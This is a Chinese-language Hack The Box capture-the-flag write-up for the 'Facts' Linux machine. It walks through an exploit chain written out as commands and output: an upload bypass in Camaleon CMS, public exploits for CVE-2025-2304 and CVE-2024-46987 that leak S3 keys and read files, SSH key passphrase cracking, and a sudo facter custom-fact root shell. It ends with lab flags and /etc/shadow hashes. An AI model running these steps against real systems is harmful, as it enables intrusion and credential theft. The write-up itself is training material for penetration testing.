[Season10] Facts WP

Posted on Edited on Word count in article: 2.2k Reading time ≈ 8 mins.
Hack The Box [Season10] Facts Linux Easy

Recon

Port Scan

80 是个 web 服务,54321 是个 MinIO

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
PORT      STATE SERVICE REASON         VERSION
22/tcp    open  ssh     syn-ack ttl 63 OpenSSH 9.9p1 Ubuntu 3ubuntu3.2 (Ubuntu Linux; protocol 2.0)
80/tcp    open  http    syn-ack ttl 63 nginx 1.26.3 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.26.3 (Ubuntu)
|_http-title: Did not follow redirect to http://facts.htb/
54321/tcp open  unknown syn-ack ttl 62
| fingerprint-strings: 
|   GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 400 Bad Request
|     Accept-Ranges: bytes
|     Content-Length: 276
|     Content-Type: application/xml
|     Server: MinIO
|     Strict-Transport-Security: max-age=31536000; includeSubDomains
|     Vary: Origin
|     X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
|     X-Amz-Request-Id: 1891DEF03210FD0F
|     X-Content-Type-Options: nosniff
|     X-Xss-Protection: 1; mode=block
|     Date: Sat, 07 Feb 2026 05:14:11 GMT
|     <?xml version="1.0" encoding="UTF-8"?>
|     <Error><Code>InvalidRequest</Code><Message>Invalid Request (invalid argument)</Message><Resource>/</Resource><RequestId>1891DEF03210FD0F</RequestId><HostId>dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8</HostId></Error>
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Vary: Origin
|     Date: Sat, 07 Feb 2026 05:14:12 GMT
|_    Content-Length: 0

Directory Brute Forcing

先用 feroxbuster 扫一下看看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
root@cloudcone ~ [1]# feroxbuster -u http://facts.htb -n -t 10
                                                                                                                                                                                                                   
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.13.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://facts.htb/
 🚩  In-Scope Url          │ facts.htb
 🚀  Threads               │ 10
 📖  Wordlist              │ /root/SecLists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.13.1
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🚫  Do Not Recurse        │ true
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200      GET      124l      552w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET      121l      443w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
302      GET        0l        0w        0c http://facts.htb/admin => http://facts.htb/admin/login
200      GET      172l      889w    19556c http://facts.htb/cats-attachment
404      GET      114l      371w     4836c http://facts.htb/fonts.googleapis.com/
200      GET      160l      733w    14975c http://facts.htb/cute-animals
200      GET       69l      448w    30396c http://facts.htb/randomfacts/logopage2.png
200      GET      271l     1166w    19187c http://facts.htb/search
200      GET        8l       11w      183c http://facts.htb/rss
404      GET      114l      371w     4836c http://facts.htb/fonts.googleapis.com/css
200      GET       66l      519w    44082c http://facts.htb/randomfacts/primary-question-mark.png
200      GET        8l     2294w   169312c http://facts.htb/assets/themes/camaleon_first/assets/css/main-41052d2acf5add707cadf8d1c12a89a9daca83fb8178fdd5c9105dc6c566d25d.css
200      GET      172l      913w    19727c http://facts.htb/first-impressions
200      GET      172l      920w    19730c http://facts.htb/animal-ejected
200      GET      178l      965w    21754c http://facts.htb/dolphin-fact
200      GET       64l      988w   206540c http://facts.htb/assets/camaleon_cms/image-not-found-fc3c0e66dc61abf74010e63ef65a2e23c4cb40a3320408f2711f82fdc22b503f.png
200      GET      166l      833w    17324c http://facts.htb/anne-frank
200      GET      172l      925w    19677c http://facts.htb/dark-chocolate
200      GET      160l      773w    15365c http://facts.htb/finland-happiest
200      GET      160l      721w    15004c http://facts.htb/animal-sweat
200      GET     9958l    40904w   330571c http://facts.htb/assets/themes/camaleon_first/assets/js/main-2d9adb006939c9873a62dff797c5fc28dff961487a2bb550824c5bc6b8dbb881.js
200      GET      281l     1177w    19593c http://facts.htb/page
200      GET        0l        0w        0c http://facts.htb/ajax
200      GET      114l      371w     4836c http://facts.htb/404
200      GET      129l      132w     3508c http://facts.htb/sitemap
200      GET       21l      101w     6444c http://facts.htb/captcha
200      GET      151l      507w    11308c http://facts.htb/post
200      GET        1l        4w       73c http://facts.htb/up
200      GET        1l        2w       33c http://facts.htb/robots
200      GET      114l      574w     7918c http://facts.htb/500
200      GET      114l      532w     6685c http://facts.htb/400

拿到了后台登录的地址 http://facts.htb/admin/login

Web

访问后台登录地址,发现可以注册账号,我们注册一个账号后登录,可以看到有上传头像的接口

formatsmedia_formats 的值置空传入,即可任意上传文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
POST /admin/media/upload?actions=true HTTP/1.1
Host: facts.htb
Content-Length: 969
Pragma: no-cache
Cache-Control: no-cache
X-CSRF-Token: 21PghifHNAksiXNYfB9rRC-bhqXLawpXxMA76a2CDE6-pVLZeO3TJh_IDrTxsDvnGfR5ZUW2DY7N6hS4gjqO8A
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryte6HKGQrv2dLGkHg
Origin: http://facts.htb
Referer: http://facts.htb/admin/profile/edit
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Cookie: auth_token=mhfr4ue4_NKMIRbhLgk6ng&Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F144.0.0.0+Safari%2F537.36&10.10.17.50; _factsapp_session=dqWYcrszAmRNF2JxeC8LH3JWACMMLEGuDklWkIrEc34tuWhkrb3xeSxfGN6cXiZ2A2b%2BVjqvp4m3b00srvHZ17bJJktE%2B4QJDXGbQo5eoYGpKzWH%2BsL3JO%2Bcr%2BAm7oWK5l7fKQn8O%2FlMjwJj7L1NQNCQB9KpWg5WS1oX5DyMOSbujdaLRKNma9H4ra9jek0p9LPBdkIVia4jUv%2FQuaHe5J2n2Yp%2B03AE1xHdxgo4xvOKH%2FvTcENIEU67nWpWjz0c%2Fza2CmaXmN9IgvHP%2FS1D%2FS017%2BXcXeiGr1nGI5bUmziGFt7YM2oE%2BFNGIkXo%2BUyqS%2FNpQXG%2BGZBJI%2FyGL84ONKgcgt88HdPFtrXOgqtxqaebhSEyFn5YwN0%3D--w9fuqewA7m43l2%2Bg--wvpZDn46maGTDhAflR4RBw%3D%3D
Connection: keep-alive

------WebKitFormBoundaryte6HKGQrv2dLGkHg
Content-Disposition: form-data; name="file_upload"; filename="konata.html"
Content-Type: image/jpeg

1

------WebKitFormBoundaryte6HKGQrv2dLGkHg
Content-Disposition: form-data; name="versions"


------WebKitFormBoundaryte6HKGQrv2dLGkHg
Content-Disposition: form-data; name="thumb_size"


------WebKitFormBoundaryte6HKGQrv2dLGkHg
Content-Disposition: form-data; name="formats"


------WebKitFormBoundaryte6HKGQrv2dLGkHg
Content-Disposition: form-data; name="media_formats"


------WebKitFormBoundaryte6HKGQrv2dLGkHg
Content-Disposition: form-data; name="dimension"


------WebKitFormBoundaryte6HKGQrv2dLGkHg
Content-Disposition: form-data; name="private"


------WebKitFormBoundaryte6HKGQrv2dLGkHg
Content-Disposition: form-data; name="folder"

/
------WebKitFormBoundaryte6HKGQrv2dLGkHg
Content-Disposition: form-data; name="skip_auto_crop"

true
------WebKitFormBoundaryte6HKGQrv2dLGkHg--

但是后端是 ruby 写的,这个用处不大,在后台的 Footer 中可以看到 CMS 名称和版本,考虑找一下 CVE

CVE-2025-2304 用户权限提升

搜索 Camaleon CMS 及版本 v2.9.0 可以知道应用受 CVE-2025-2304 影响

使用 Alien0ne/CVE-2025-2304: Authenticated privilege escalation in Camaleon CMS v2.9.0 via improper parameter handling in the updated_ajax endpoint.

1
2
3
4
5
6
7
8
9
10
11
12
13
l1nk@kali-wsl ~/t/CVE-2025-2304 (main)> python3 exploit.py -u http://facts.htb -U l1nk -P l1nk -e                                                                                              
[+]Camaleon CMS Version 2.9.0 PRIVILEGE ESCALATION (Authenticated)
[+]Login confirmed
   User ID: 5
   Current User Role: client
[+]Loading PPRIVILEGE ESCALATION
   User ID: 5
   Updated User Role: admin
[+]Extracting S3 Credentials
   s3 access key: AKIADF43831764777DB0
   s3 secret key: 1P7PNW0WkYJxcc5LO9zZL4U6a3Ob2U68XTOWOepJ
   s3 endpoint: http://localhost:54321
[+]Reverting User Role

我们也可以登录后访问 /admin/settings/site 查看 s3 的相关信息利用一下得到的 s3 aksk,拿到一个 ssh 私钥

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
export AWS_ACCESS_KEY_ID=AKIADF43831764777DB0
export AWS_SECRET_ACCESS_KEY=1P7PNW0WkYJxcc5LO9zZL4U6a3Ob2U68XTOWOepJ
export AWS_DEFAULT_REGION=us-east-1
export AWS_ENDPOINT_URL=http://$IP:54321
aws s3 ls


root@cloudcone ~/workspace# aws s3 ls s3://internal/.ssh/
2026-02-07 04:24:18         82 authorized_keys
2026-02-07 04:24:18        464 id_ed25519

root@cloudcone ~/workspace# aws s3 sync s3://internal/.ssh/ .
download: s3://internal/.ssh/authorized_keys to ./authorized_keys               
download: s3://internal/.ssh/id_ed25519 to ./id_ed25519  

root@cloudcone ~/workspace# cat id_ed25519 
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABDvLOF5Go
dZRwjEQpG2lsb9AAAAGAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAIN2LDLdlLXk4rxsV
3mD4qZCSgAqF5SGOcngtgBCfLi05AAAAoN8OmCb67waKpmizk7F+OvQ01qYcVOqOBpT1og
zGTcBKrWbJotY01TsPvJeXjaw2PoxFRTtCFen9LI2bElqqivRWoqt/5LetMXBE9D7f+hWX
mTV1/19kefeAZe714/bHIRbEsv1nffowTbbRJwRSLAR+rh5E4Cb1efLEjzPAvPHA6o++dS
FPWVn51GFhDLzzKbhPjd/in1GhtVPPpZ4uhpw=
-----END OPENSSH PRIVATE KEY-----

尝试登录了 root,看起来这个私钥不是属于 root 的,得想个办法拿到别的用户名

CVE-2024-46987 任意文件读取 & User Flag

注意到还有个 CVE 可以起效,能够进行任意文件读取 Goultarde/CVE-2024-46987: This Python PoC exploits CVE-2024-46987, a Path Traversal bug in Camaleon CMS 2.8.0 < 2.8.2 (work on 2.9.0). It allows authenticated users to read sensitive server files via the MediaController. Intended for authorized security auditing and educational research only.

我们先读一下 /etc/passwd 看看存在哪些用户

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
l1nk@kali-wsl ~/t/CVE-2024-46987 (main)> python3 CVE-2024-46987.py -u http://facts.htb -l l1nk2 -p l1nk2 /etc/passwd                                                                               
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
usbmux:x:100:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:102:102::/nonexistent:/usr/sbin/nologin
systemd-resolve:x:992:992:systemd Resolver:/:/usr/sbin/nologin
pollinate:x:103:1::/var/cache/pollinate:/bin/false
polkitd:x:991:991:User for polkitd:/:/usr/sbin/nologin
syslog:x:104:104::/nonexistent:/usr/sbin/nologin
uuidd:x:105:105::/run/uuidd:/usr/sbin/nologin
tcpdump:x:106:107::/nonexistent:/usr/sbin/nologin
tss:x:107:108:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:108:109::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:989:989:Firmware update daemon:/var/lib/fwupd:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
trivia:x:1000:1000:facts.htb:/home/trivia:/bin/bash
william:x:1001:1001::/home/william:/bin/bash
_laurel:x:101:988::/var/log/laurel:/bin/false

尝试遍历一下用户目录拿到 user flag

1
2
l1nk@kali-wsl ~/t/CVE-2024-46987 (main)> python3 CVE-2024-46987.py -u http://facts.htb -l l1nk2 -p l1nk2 /home/william/user.txt                                                                    
bc66c50d3e0b6c665bd2e090b9540e99

Root Flag

尝试使用私钥登录 ssh,但是发现要 passphrase,用 John 爆一下

1
2
ssh2john id_ed25519 > tmp
john --wordlist=/usr/share/wordlists/rockyou.txt tmp

得到 dragonballz,ssh 登录用户 trivia

查看一下 sudo 权限,发现有个可以利用的工具

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
trivia@facts:~$ sudo -l
Matching Defaults entries for trivia on facts:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User trivia may run the following commands on facts:
    (ALL) NOPASSWD: /usr/bin/facter
    
trivia@facts:~$ /usr/bin/facter -h
Usage
=====

  facter [options] [query] [query] [...]

Options
=======
           [--color]                      Enable color output.
           [--no-color]                   Disable color output.
        -c [--config]                     The location of the config file.
           [--custom-dir]                 A directory to use for custom facts.
        -d [--debug]                      Enable debug output.
           [--external-dir]               A directory to use for external facts.
           [--hocon]                      Output in Hocon format.
        -j [--json]                       Output in JSON format.
        -l [--log-level]                  Set logging level. Supported levels are: none, trace, debug, info, warn, error, and fatal.
           [--no-block]                   Disable fact blocking.
           [--no-cache]                   Disable loading and refreshing facts from the cache
           [--no-custom-facts]            Disable custom facts.
           [--no-external-facts]          Disable external facts.
           [--no-ruby]                    Disable loading Ruby, facts requiring Ruby, and custom facts.
           [--trace]                      Enable backtraces for custom facts.
           [--verbose]                    Enable verbose (info) output.
           [--show-legacy]                Show legacy facts when querying all facts.
        -y [--yaml]                       Output in YAML format.
           [--strict]                     Enable more aggressive error reporting.
        -t [--timing]                     Show how much time it took to resolve each fact
           [--sequential]                 Resolve facts sequentially
           [--http-debug]                 Whether to write HTTP request and responses to stderr. This should never be used in production.
        -p [--puppet]                     Load the Puppet libraries, thus allowing Facter to load Puppet-specific facts.
        -v [--version]                    Print the version
           [--list-block-groups]          List block groups
           [--list-cache-groups]          List cache groups
        -h [--help]                       Help for all arguments

这个工具可以用于运行 ruby 代码,开个 shell 就能提权了

1
2
3
4
5
6
trivia@facts:~$ mkdir /tmp/exploit
trivia@facts:~$ echo 'exec("/bin/bash")' > /tmp/exploit/tmp.rb
trivia@facts:~$ sudo /usr/bin/facter -p --custom-dir /tmp/exploit
[2026-02-07 07:23:54.785180 ] ERROR Facter - Could not load puppet gem, got cannot load such file -- puppet 
root@facts:/home/trivia# cat /root/root.txt
dc9f0389c361a9a4d26113d4154a39f5

Hash

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
root:$y$j9T$7gs6EMa6c.zpFgKM3Grtz.$q8L7RyD.tdOf9DEhsqmEYBdKBrmxJ60ItpltO/x2nSB:20342:0:99999:7:::
daemon:*:20003:0:99999:7:::
bin:*:20003:0:99999:7:::
sys:*:20003:0:99999:7:::
sync:*:20003:0:99999:7:::
games:*:20003:0:99999:7:::
man:*:20003:0:99999:7:::
lp:*:20003:0:99999:7:::
mail:*:20003:0:99999:7:::
news:*:20003:0:99999:7:::
uucp:*:20003:0:99999:7:::
proxy:*:20003:0:99999:7:::
www-data:*:20003:0:99999:7:::
backup:*:20003:0:99999:7:::
list:*:20003:0:99999:7:::
irc:*:20003:0:99999:7:::
_apt:*:20003:0:99999:7:::
nobody:*:20003:0:99999:7:::
systemd-network:!*:20003::::::
usbmux:!:20003::::::
systemd-timesync:!*:20003::::::
messagebus:!:20003::::::
systemd-resolve:!*:20003::::::
pollinate:!:20003::::::
polkitd:!*:20003::::::
syslog:!:20003::::::
uuidd:!:20003::::::
tcpdump:!:20003::::::
tss:!:20003::::::
landscape:!:20003::::::
fwupd-refresh:!*:20003::::::
sshd:!:20338::::::
trivia:$y$j9T$1fYkuzD9.m5y7SwWSTUqh/$hb29dYfEthOUaEZr8D1GriIfSkeu8YeiI2WWxMmoiG0:20342:0:99999:7:::
william:$y$j9T$L/LMpuHMall7H5uzpS/mL1$L1EJ9y7BdcE10UIxBSow2eStbt1SefLToaTh4hDacD2:20461:0:99999:7:::
_laurel:!:20479::::::